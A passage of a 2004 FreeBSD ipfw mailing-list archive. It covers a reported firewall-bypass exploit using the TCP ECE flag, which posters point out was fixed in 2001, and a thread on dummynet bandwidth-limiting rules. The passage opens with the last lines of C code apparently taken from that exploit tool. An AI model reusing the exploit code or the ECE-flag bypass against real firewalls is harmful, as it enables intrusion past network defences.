(FD_ISSET(psock, &wfs)) flushpacket(psock); } /* Do we have input available ? */ if (FD_ISSET(inoutsock, &rfs)) { /* Yip, handle it */ handle_input(inoutsock); } } } /* spidermark sensepostdata ece*/ From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 02:35:00 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 151F216A4CE for ; Wed, 14 Apr 2004 02:35:00 -0700 (PDT) Received: from tx2.oucs.ox.ac.uk (tx2.oucs.ox.ac.uk [163.1.2.163]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8F45543D5A for ; Wed, 14 Apr 2004 02:34:59 -0700 (PDT) (envelope-from colin.percival@wadham.ox.ac.uk) Received: from scan2.oucs.ox.ac.uk ([163.1.2.162] helo=localhost) by tx2.oucs.ox.ac.uk with esmtp (Exim 4.24) id 1BDgnK-0005k5-LS for freebsd-ipfw@freebsd.org; Wed, 14 Apr 2004 10:34:58 +0100 Received: from rx2.oucs.ox.ac.uk ([163.1.2.161]) by localhost (scan2.oucs.ox.ac.uk [163.1.2.162]) (amavisd-new, port 25) with ESMTP id 21759-08 for ; Wed, 14 Apr 2004 10:34:58 +0100 (BST) Received: from gateway.wadham.ox.ac.uk ([163.1.161.253]) by rx2.oucs.ox.ac.uk with smtp (Exim 4.24) id 1BDgnK-0005jy-83 for freebsd-ipfw@freebsd.org; Wed, 14 Apr 2004 10:34:58 +0100 Received: (qmail 5515 invoked by uid 1004); 14 Apr 2004 09:34:58 -0000 Received: from colin.percival@wadham.ox.ac.uk by gateway by uid 71 with qmail-scanner-1.20 (clamscan: 0.67. sweep: 2.18/3.79. Clear:RC:1(163.1.161.131):. Processed in 0.135248 secs); 14 Apr 2004 09:34:58 -0000 Received: from dhcp1131.wadham.ox.ac.uk (HELO piii600.wadham.ox.ac.uk) (163.1.161.131) by gateway.wadham.ox.ac.uk with SMTP; 14 Apr 2004 09:34:58 -0000 Message-Id: <6.0.1.1.1.20040414102727.03ad0008@imap.sfu.ca> X-Sender: cperciva@imap.sfu.ca (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 6.0.1.1 Date: Wed, 14 Apr 2004 10:34:55 +0100 To: freebsd-security@freebsd.org From: Colin Percival Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" cc: freebsd-ipfw@freebsd.org Subject: FYI re: "FreeBSD ECE flag ipfw protection bypass" X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 14 Apr 2004 09:35:00 -0000 Several people have noticed that SecuriTeam.com is reporting a "FreeBSD ECE flag ipfw protection bypass" exploit. In an effort to save time, let me say this publicly: SecuriTeam.com is three years out of date. This problem was fixed in FreeBSD 3.5-STABLE and 4.2-STABLE in January 2001, and reported in Security Advisory FreeBSD-SA-01:08. Colin Percival From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 04:27:23 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7393616A4CE for ; Wed, 14 Apr 2004 04:27:23 -0700 (PDT) Received: from smtp3.euronet.nl (smtp3.euronet.nl [194.134.35.173]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3250043D39 for ; Wed, 14 Apr 2004 04:27:23 -0700 (PDT) (envelope-from dodell@offmyserver.com) Received: from offmyserver.com (zp-c-13e65.mxs.adsl.euronet.nl [81.69.92.101]) by smtp3.euronet.nl (Postfix) with ESMTP id 109323A03E; Wed, 14 Apr 2004 13:27:22 +0200 (MEST) Message-ID: <407D1F3A.6070607@offmyserver.com> Date: Wed, 14 Apr 2004 13:23:38 +0200 From: "Devon H. O'Dell" User-Agent: Mozilla Thunderbird 0.5 (Windows/20040207) X-Accept-Language: en-us, en MIME-Version: 1.0 To: sd@buc.com.ua References: <200403171648.i2HGmWwS015144@freefall.freebsd.org> <407D1E4F.4000500@buc.com.ua> In-Reply-To: <407D1E4F.4000500@buc.com.ua> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit cc: freebsd-ipfw@freebsd.org Subject: Re: IPFW ECE Firewall Bypassing Exploit X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 14 Apr 2004 11:27:23 -0000 Dmitry Surovtsev wrote: > securiteam news (http://www.securiteam.com/exploits/5CP0B0UCKU.html): > > A vulnerability in FreeBSD's implementation of packet filtering for IPv4 > and IPv6 has been found. The vulnerability allows specially crafted > packets that are not part of an established connection to go through the > firewall. These special packets must have the ECE flag set, which is in > the TCP reserved options field. > > [snip] Hello Dmitry, This bug was fixed circa three years ago. Please see the date on the exploit. Kind regards, Devon H. O'Dell From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 04:42:12 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4E9CA16A4CE for ; Wed, 14 Apr 2004 04:42:12 -0700 (PDT) Received: from mailgw.dgrp.sk (mailgw.dgrp.sk [195.28.127.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id EE12A43D3F for ; Wed, 14 Apr 2004 04:42:10 -0700 (PDT) (envelope-from koren@tempest.sk) Received: by mailgw.dgrp.sk (Postfix, from userid 1003) id B3BCE4FD9F; Wed, 14 Apr 2004 13:42:09 +0200 (CEST) Received: from domino1.tempest.sk (domino1.tempest.sk [195.28.100.38]) by mailgw.dgrp.sk (Postfix) with ESMTP id 532174FD87; Wed, 14 Apr 2004 13:42:04 +0200 (CEST) Received: from lk106.tempest.sk ([195.28.109.36]) by domino1.tempest.sk (Lotus Domino Release 6.5.1IF1) with ESMTP id 2004041413420308-1221 ; Wed, 14 Apr 2004 13:42:03 +0200 Received: from lk106.tempest.sk (localhost [127.0.0.1]) by lk106.tempest.sk (8.12.10/8.12.5) with ESMTP id i3EBfuBp088465; Wed, 14 Apr 2004 13:41:56 +0200 (CEST) (envelope-from koren@lk106.tempest.sk) Received: (from koren@localhost) by lk106.tempest.sk (8.12.10/8.12.10/Submit) id i3EBfsER088462; Wed, 14 Apr 2004 13:41:54 +0200 (CEST) (envelope-from koren) Date: Wed, 14 Apr 2004 13:41:54 +0200 (CEST) Message-Id: <200404141141.i3EBfsER088462@lk106.tempest.sk> From: Ludo Koren To: rizzo@icir.org In-reply-to: <20040413101346.B98975@xorpc.icir.org> (message from Luigi Rizzo on Tue, 13 Apr 2004 10:13:46 -0700) X-MIMETrack: Itemize by SMTP Server on Domino1/DGRP(Release 6.5.1IF1|March 16, 2004) at 14.04.2004 13:42:03,at 14.04.2004 13:42:04, Serialize complete at 14.04.2004 13:42:04 X-Spam-Checker-Version: SpamAssassin 2.61 (1.212.2.1-2003-12-09-exp) on mailgw X-Spam-Status: No, hits=0.0 required=5.0 tests=none autolearn=no version=2.61 X-Spam-Level: cc: jacks@sage-american.com cc: ipfw@freebsd.org cc: tscrum@aaawebsolution.com Subject: Re: limiting bandwith X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 14 Apr 2004 11:42:12 -0000 Maybe I should re-state my original question. The FreeBSD machine with ipfw is routing and filtering. I need limit and weight data flow, i.e. if interactive session exists, I need fixed bandwidth and asap processing. Batch jobs, like SMTP maybe postponed and processed, if the bandwidth is free. In addition, I need NAT `interactive' addresses. Could anybody point me to a working example? Everything I find is too general or briefly described. Thank you very much in advance. Regards, lk From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 05:36:18 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1E16916A4CE for ; Wed, 14 Apr 2004 05:36:18 -0700 (PDT) Received: from server1.aaawebsolution.com (aaawebsolution.com [209.61.189.249]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3567043D1D for ; Wed, 14 Apr 2004 05:36:17 -0700 (PDT) (envelope-from tscrum@aaawebsolution.com) Received: from wolf (fl-well-u1-c3c-157.pbc.adelphia.net [24.54.174.157]) (authenticated)i3ECaG905396; Wed, 14 Apr 2004 07:36:16 -0500 From: "Thomas S. Crum - AAA Web Solution, Inc." To: "'Ludo Koren'" Date: Wed, 14 Apr 2004 08:36:03 -0400 Message-ID: <004e01c4221d$12e96c60$6466a8c0@wolf> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_004F_01C421FB.8BD7CC60" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4024 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2727.1300 In-Reply-To: <200404141141.i3EBfsER088462@lk106.tempest.sk> X-Content-Filtered-By: Mailman/MimeDel 2.1.1 cc: ipfw@freebsd.org Subject: RE: limiting bandwith X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 14 Apr 2004 12:36:18 -0000 This is a multi-part message in MIME format. ------=_NextPart_000_004F_01C421FB.8BD7CC60 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit I do not believe there is a way to "postpone" traffic with dummynet other than what is available with queues, not to mention I don't think you'd ever want to, really. The config below will give mail a lower priority to all of the other traffic, both in and out. Nat interactive addresses? Hmmm... you mean you want ipfw to forward local addresses using nat? you want to dole out local ip addresses, dhcp? Not really sure of the question here, but I'm sure its answered by following the link below to the freebsd handbook. http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/index.html # This is a ruleset that will give mail a lower priority to all other packets. Pipe's are configured assuming you have a t1 Internet connection and would like to use the bandwidth as shown. Salt to taste from here. # APPLIES TO INCOMING PACKETS (DOWNLOADS) ipfw add queue 1 tcp from any to 10.1.2.0/24 25,110 ipfw queue 1 config weight 1 pipe 1 mask dst-ip 0x000000ff ipfw add queue 2 ip from any to 10.1.2.0/24 ipfw queue 2 config weight 5 pipe 1 mask dst-ip 0x000000ff ipfw pipe 1 config bw 1000Kbit/s # APPLIES TO OUTGOING PACKETS (UPLOADS) ipfw add queue 3 tcp from 10.1.2.0/24 25,110 to any ipfw queue 3 config weight 1 pipe 2 mask src-ip 0x000000ff ipfw add queue 4 ip from 10.1.2.0/24 to any ipfw queue 4 config weight 5 pipe 2 mask src-ip 0x000000ff ipfw pipe 2 config bw 500Kbit/s Best, Thomas S. Crum Senior Technical Associate tscrum@aaawebsolution.com Toll-free: (800) 834-0626 AAA Web Solution, Inc. 11924 W Forest Hill Boulevard Building 22 - Mailstop 200 Wellington, FL 33414 USA Providing full-service website design, maintenance, hosting, and marketing. No task is too small or enterprise too large for us to help you! ------------------------------------------------------------------------ ---- -----Original Message----- From: owner-freebsd-ipfw@freebsd.org [mailto:owner-freebsd-ipfw@freebsd.org] On Behalf Of Ludo Koren Sent: Wednesday, April 14, 2004 7:42 AM To: rizzo@icir.org Cc: jacks@sage-american.com; ipfw@freebsd.org; tscrum@aaawebsolution.com Subject: Re: limiting bandwith Maybe I should re-state my original question. The FreeBSD machine with ipfw is routing and filtering. I need limit and weight data flow, i.e. if interactive session exists, I need fixed bandwidth and asap processing. Batch jobs, like SMTP maybe postponed and processed, if the bandwidth is free. In addition, I need NAT `interactive' addresses. Could anybody point me to a working example? Everything I find is too general or briefly described. Thank you very much in advance. Regards, lk _______________________________________________ freebsd-ipfw@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-ipfw To unsubscribe, send any mail to "freebsd-ipfw-unsubscribe@freebsd.org" ------=_NextPart_000_004F_01C421FB.8BD7CC60-- From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 06:09:16 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 47FE016A4CE for ; Wed, 14 Apr 2004 06:09:16 -0700 (PDT) Received: from pitt.sitel.com.ua (pitt.sitel.com.ua [217.27.144.5]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2631543D39 for ; Wed, 14 Apr 2004 06:09:14 -0700 (PDT) (envelope-from sd@buc.com.ua) Received: from arrow.buc.com.ua (arrow.sitel.com.ua [217.27.145.61]) by pitt.sitel.com.ua (8.12.9p2/8.12.9) with ESMTP id i3ED91Sr088933; Wed, 14 Apr 2004 16:09:03 +0300 (EEST) (envelope-from sd@buc.com.ua) Received: by arrow.buc.com.ua (Postfix, from userid 1002) id 7840090058; Wed, 14 Apr 2004 16:08:28 +0000 (GMT) Received: from buc.com.ua (unknown [192.168.13.97]) by arrow.buc.com.ua (Postfix) with ESMTP id 5C42590053; Wed, 14 Apr 2004 16:08:28 +0000 (GMT) Message-ID: <407D6210.1070202@buc.com.ua> Date: Wed, 14 Apr 2004 16:08:48 +0000 From: Dmitry Surovtsev User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020610 X-Accept-Language: ru, uk, en-us, en MIME-Version: 1.0 To: "Devon H. O'Dell" References: <200403171648.i2HGmWwS015144@freefall.freebsd.org> <407D1E4F.4000500@buc.com.ua> <407D1F3A.6070607@offmyserver.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit cc: freebsd-ipfw@freebsd.org Subject: Re: IPFW ECE Firewall Bypassing Exploit X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list Reply-To: sd@buc.com.ua List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 14 Apr 2004 13:09:16 -0000 Thanks, that's right, ouhh ;-) i do not know why securiteam.com/ dated it _14 Apr 2004_. Devon H. O'Dell wrote: > Dmitry Surovtsev wrote: > >> securiteam news (http://www.securiteam.com/exploits/5CP0B0UCKU.html): >> >> A vulnerability in FreeBSD's implementation of packet filtering for IPv4 >> and IPv6 has been found. The vulnerability allows specially crafted >> packets that are not part of an established connection to go through the >> firewall. These special packets must have the ECE flag set, which is in >> the TCP reserved options field. >> >> [snip] > > > Hello Dmitry, > > This bug was fixed circa three years ago. Please see the date on the > exploit. > > Kind regards, > > Devon H. O'Dell > > From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 07:51:58 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 82CCB16A4CF for ; Wed, 14 Apr 2004 07:51:58 -0700 (PDT) Received: from mailgw.dgrp.sk (mailgw.dgrp.sk [195.28.127.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id CC96A43D58 for ; Wed, 14 Apr 2004 07:51:56 -0700 (PDT) (envelope-from koren@tempest.sk) Received: by mailgw.dgrp.sk (Postfix, from userid 1003) id E0E3D4FD83; Wed, 14 Apr 2004 16:51:55 +0200 (CEST) Received: from domino1.tempest.sk (unknown [195.28.100.38]) by mailgw.dgrp.sk (Postfix) with ESMTP id 73B0B4FD9E; Wed, 14 Apr 2004 16:51:55 +0200 (CEST) Received: from lk106.tempest.sk ([195.28.109.36]) by domino1.tempest.sk (Lotus Domino Release 6.5.1IF1) with ESMTP id 2004041416515362-1294 ; Wed, 14 Apr 2004 16:51:53 +0200 Received: from lk106.tempest.sk (localhost [127.0.0.1]) by lk106.tempest.sk (8.12.10/8.12.5) with ESMTP id i3EEplBp069191; Wed, 14 Apr 2004 16:51:47 +0200 (CEST) (envelope-from koren@lk106.tempest.sk) Received: (from koren@localhost) by lk106.tempest.sk (8.12.10/8.12.10/Submit) id i3EEpjJH069188; Wed, 14 Apr 2004 16:51:45 +0200 (CEST) (envelope-from koren) Date: Wed, 14 Apr 2004 16:51:45 +0200 (CEST) Message-Id: <200404141451.i3EEpjJH069188@lk106.tempest.sk> From: Ludo Koren To: tscrum@aaawebsolution.com In-reply-to: <004e01c4221d$12e96c60$6466a8c0@wolf> (tscrum@aaawebsolution.com) X-MIMETrack: Itemize by SMTP Server on Domino1/DGRP(Release 6.5.1IF1|March 16, 2004) at 14.04.2004 16:51:53,at 14.04.2004 16:51:55, Serialize complete at 14.04.2004 16:51:55 X-Spam-Checker-Version: SpamAssassin 2.61 (1.212.2.1-2003-12-09-exp) on mailgw X-Spam-Status: No, hits=0.0 required=5.0 tests=none autolearn=no version=2.61 X-Spam-Level: cc: ipfw@freebsd.org Subject: Re: limiting bandwith X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 14 Apr 2004 14:51:58 -0000 > I do not believe there is a way to "postpone" traffic with > dummynet other than what is available with queues, not to > mention I don't think you'd ever want to, really. The config > below will give mail a lower priority to all of the other > traffic, both in and out. > Nat interactive addresses? Hmmm... you mean you want ipfw to > forward local addresses using nat? you want to dole out local > ip addresses, dhcp? Not really sure of the question here, but > I'm sure its answered by following the link below to the > freebsd handbook. I wrote `interactive' (ticks), and I meant addresses that are used to connect to ssh, web, etc (interactive processes). All these addresses are NAT-ed. For these, your setup is working fine. Thank you very much. The problem, I still have, is the following: the SMTP is flowing through, I am not relaying e-mail on this host. It seems to me, I cannot put together a rule which pass the traffic and add it to the queue except when I use keep-state flag. In this setup (keep-state), Luigi wrote it does not work. Regards, lk From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 07:56:45 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EC3C916A4D0 for ; Wed, 14 Apr 2004 07:56:45 -0700 (PDT) Received: from xorpc.icir.org (xorpc.icir.org [192.150.187.68]) by mx1.FreeBSD.org (Postfix) with ESMTP id D72C443D49 for ; Wed, 14 Apr 2004 07:56:45 -0700 (PDT) (envelope-from rizzo@icir.org) Received: from xorpc.icir.org (localhost [127.0.0.1]) by xorpc.icir.org (8.12.9p1/8.12.8) with ESMTP id i3EEuigd096428; Wed, 14 Apr 2004 07:56:44 -0700 (PDT) (envelope-from rizzo@xorpc.icir.org) Received: (from rizzo@localhost) by xorpc.icir.org (8.12.9p1/8.12.3/Submit) id i3EEui9U096427; Wed, 14 Apr 2004 07:56:44 -0700 (PDT) (envelope-from rizzo) Date: Wed, 14 Apr 2004 07:56:44 -0700 From: Luigi Rizzo To: Ludo Koren Message-ID: <20040414075644.A95599@xorpc.icir.org> References: <004e01c4221d$12e96c60$6466a8c0@wolf> <200404141451.i3EEpjJH069188@lk106.tempest.sk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200404141451.i3EEpjJH069188@lk106.tempest.sk>; from lk@tempest.sk on Wed, Apr 14, 2004 at 04:51:45PM +0200 cc: ipfw@freebsd.org cc: tscrum@aaawebsolution.com Subject: Re: limiting bandwith X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 14 Apr 2004 14:56:46 -0000 On Wed, Apr 14, 2004 at 04:51:45PM +0200, Ludo Koren wrote: > > > > I do not believe there is a way to "postpone" traffic with > > dummynet other than what is available with queues, not to > > mention I don't think you'd ever want to, really. The config > > below will give mail a lower priority to all of the other > > traffic, both in and out. > > > Nat interactive addresses? Hmmm... you mean you want ipfw to > > forward local addresses using nat? you want to dole out local > > ip addresses, dhcp? Not really sure of the question here, but > > I'm sure its answered by following the link below to the > > freebsd handbook. > > > I wrote `interactive' (ticks), and I meant addresses that are used to > connect to ssh, web, etc (interactive processes). All these addresses > are NAT-ed. For these, your setup is working fine. Thank you very > much. > > The problem, I still have, is the following: the SMTP is flowing > through, I am not relaying e-mail on this host. It seems to me, I > cannot put together a rule which pass the traffic and add it to the > queue except when I use keep-state flag. In this setup (keep-state), > Luigi wrote it does not work. i said your configuration does not work the way you want. It is possible to write a proper configuration that does what you want but it is left as an exercise to the reader. cheers luigi From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 08:13:39 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 90E1A16A4CE for ; Wed, 14 Apr 2004 08:13:39 -0700 (PDT) Received: from mailgw.dgrp.sk (mailgw.dgrp.sk [195.28.127.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1469643D41 for ; Wed, 14 Apr 2004 08:13:39 -0700 (PDT) (envelope-from koren@tempest.sk) Received: by mailgw.dgrp.sk (Postfix, from userid 1003) id 0D6CA4FD93; Wed, 14 Apr 2004 17:13:38 +0200 (CEST) Received: from domino1.tempest.sk (unknown [195.28.100.38]) by mailgw.dgrp.sk (Postfix) with ESMTP id 91D544FD83; Wed, 14 Apr 2004 17:13:37 +0200 (CEST) Received: from lk106.tempest.sk ([195.28.109.36]) by domino1.tempest.sk (Lotus Domino Release 6.5.1IF1) with ESMTP id 2004041417133592-1306 ; Wed, 14 Apr 2004 17:13:35 +0200 Received: from lk106.tempest.sk (localhost [127.0.0.1]) by lk106.tempest.sk (8.12.10/8.12.5) with ESMTP id i3EFDRBp084325; Wed, 14 Apr 2004 17:13:27 +0200 (CEST) (envelope-from koren@lk106.tempest.sk) Received: (from koren@localhost) by lk106.tempest.sk (8.12.10/8.12.10/Submit) id i3EFDR5R084225; Wed, 14 Apr 2004 17:13:27 +0200 (CEST) (envelope-from koren) Date: Wed, 14 Apr 2004 17:13:27 +0200 (CEST) Message-Id: <200404141513.i3EFDR5R084225@lk106.tempest.sk> From: Ludo Koren To: rizzo@icir.org In-reply-to: <20040414075644.A95599@xorpc.icir.org> (message from Luigi Rizzo on Wed, 14 Apr 2004 07:56:44 -0700) X-MIMETrack: Itemize by SMTP Server on Domino1/DGRP(Release 6.5.1IF1|March 16, 2004) at 14.04.2004 17:13:35,at 14.04.2004 17:13:37, Serialize complete at 14.04.2004 17:13:37 X-Spam-Checker-Version: SpamAssassin 2.61 (1.212.2.1-2003-12-09-exp) on mailgw X-Spam-Status: No, hits=0.0 required=5.0 tests=none autolearn=no version=2.61 X-Spam-Level: cc: ipfw@freebsd.org cc: tscrum@aaawebsolution.com Subject: Re: limiting bandwith X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 14 Apr 2004 15:13:39 -0000 >> I wrote `interactive' (ticks), and I meant addresses that are >> used to connect to ssh, web, etc (interactive processes). All >> these addresses are NAT-ed. For these, your setup is working >> fine. Thank you very much. >> >> The problem, I still have, is the following: the SMTP is >> flowing through, I am not relaying e-mail on this host. It >> seems to me, I cannot put together a rule which pass the >> traffic and add it to the queue except when I use keep-state >> flag. In this setup (keep-state), Luigi wrote it does not work. > i said your configuration does not work the way you want. It > is possible to write a proper configuration that does what you > want but it is left as an exercise to the reader. That I had understand. The problem is, the exercise I don't know to do, even I tried hard several days... call me stupid... The setup is: pass 2 mail servers without NAT and add the traffic from the LAN to WAN to the queue and limit it (or weigth it). If I add: ipfw add queue 3 tcp from A to B 25 ipfw queue 3 config weight 1 pipe 10 mask src-ip 0x000000ff ipfw pipe 10 config bw 256Kbit/s and remove all rules with keep-state, it stops working. > cheers luigi Regards, lk From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 09:43:59 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 75F6E16A4CE for ; Wed, 14 Apr 2004 09:43:59 -0700 (PDT) Received: from server1.aaawebsolution.com (aaawebsolution.com [209.61.189.249]) by mx1.FreeBSD.org (Postfix) with ESMTP id E8B2F43D45 for ; Wed, 14 Apr 2004 09:43:58 -0700 (PDT) (envelope-from tscrum@aaawebsolution.com) Received: from wolf (fl-well-u1-c3c-157.pbc.adelphia.net [24.54.174.157]) (authenticated)i3EGhw925662; Wed, 14 Apr 2004 11:43:58 -0500 From: "Thomas S. Crum - AAA Web Solution, Inc." To: "'Ludo Koren'" Date: Wed, 14 Apr 2004 12:43:45 -0400 Message-ID: <001201c4223f$ad443930$6466a8c0@wolf> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0013_01C4221E.26329930" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4024 In-reply-to: <200404141513.i3EFDR5R084225@lk106.tempest.sk> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2739.300 Importance: Normal X-Content-Filtered-By: Mailman/MimeDel 2.1.1 cc: ipfw@freebsd.org Subject: RE: limiting bandwith X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 14 Apr 2004 16:43:59 -0000 This is a multi-part message in MIME format. ------=_NextPart_000_0013_01C4221E.26329930 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Using keep-state "is" the most efficient way to do it. The config that I sent would still allow smtp and pop through, but limited as to the weight of the queue. Maybe I am misunderstanding what you are saying. Are you saying that the mail is traversing unabated by the ruleset? Best, Thomas S. Crum Senior Technical Associate tscrum@aaawebsolution.com Toll-free: (800) 834-0626 AAA Web Solution, Inc. 11924 W Forest Hill Boulevard Building 22 - Mailstop 200 Wellington, FL 33414 USA Providing full-service website design, maintenance, hosting, and marketing. No task is too small or enterprise too large for us to help you! ------------------------------------------------------------------------ ---- -----Original Message----- From: owner-freebsd-ipfw@freebsd.org [mailto:owner-freebsd-ipfw@freebsd.org] On Behalf Of Ludo Koren Sent: Wednesday, April 14, 2004 11:13 AM To: rizzo@icir.org Cc: ipfw@freebsd.org; tscrum@aaawebsolution.com Subject: Re: limiting bandwith >> I wrote `interactive' (ticks), and I meant addresses that are >> used to connect to ssh, web, etc (interactive processes). All >> these addresses are NAT-ed. For these, your setup is working >> fine. Thank you very much. >> >> The problem, I still have, is the following: the SMTP is >> flowing through, I am not relaying e-mail on this host. It >> seems to me, I cannot put together a rule which pass the >> traffic and add it to the queue except when I use keep-state >> flag. In this setup (keep-state), Luigi wrote it does not work. > i said your configuration does not work the way you want. It > is possible to write a proper configuration that does what you > want but it is left as an exercise to the reader. That I had understand. The problem is, the exercise I don't know to do, even I tried hard several days... call me stupid... The setup is: pass 2 mail servers without NAT and add the traffic from the LAN to WAN to the queue and limit it (or weigth it). If I add: ipfw add queue 3 tcp from A to B 25 ipfw queue 3 config weight 1 pipe 10 mask src-ip 0x000000ff ipfw pipe 10 config bw 256Kbit/s and remove all rules with keep-state, it stops working. > cheers luigi Regards, lk _______________________________________________ freebsd-ipfw@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-ipfw To unsubscribe, send any mail to "freebsd-ipfw-unsubscribe@freebsd.org" ------=_NextPart_000_0013_01C4221E.26329930-- From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 11:26:04 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1C7C416A4CE for ; Wed, 14 Apr 2004 11:26:04 -0700 (PDT) Received: from web60101.mail.yahoo.com (web60101.mail.yahoo.com [216.109.118.80]) by mx1.FreeBSD.org (Postfix) with SMTP id A4BFC43D45 for ; Wed, 14 Apr 2004 11:26:03 -0700 (PDT) (envelope-from life1dj@yahoo.com) Message-ID: <20040414182601.70010.qmail@web60101.mail.yahoo.com> Received: from [82.77.146.148] by web60101.mail.yahoo.com via HTTP; Wed, 14 Apr 2004 11:26:01 PDT Date: Wed, 14 Apr 2004 11:26:01 -0700 (PDT) From: Lucian Lungu To: freebsd-ipfw@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Subject: ipfw dummynet advice X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 14 Apr 2004 18:26:04 -0000 > I need help because i can`t manage the problem. > I have a 290 kbits bandwidth Internet connection on > interface rl1 and a LAN with 50 users on interface > rl0... > I used ipfw to let only the http working over the > squid... no other traffic because the bw it`s small > > I want to make a dynamic limitation with dummynet or > if it doesn`t work a static one per each user... I > tried diffrent firewall settings like those under > but when i get the bw limit on downloads..the pages > load too slow... > > ipe 1 config bw delay 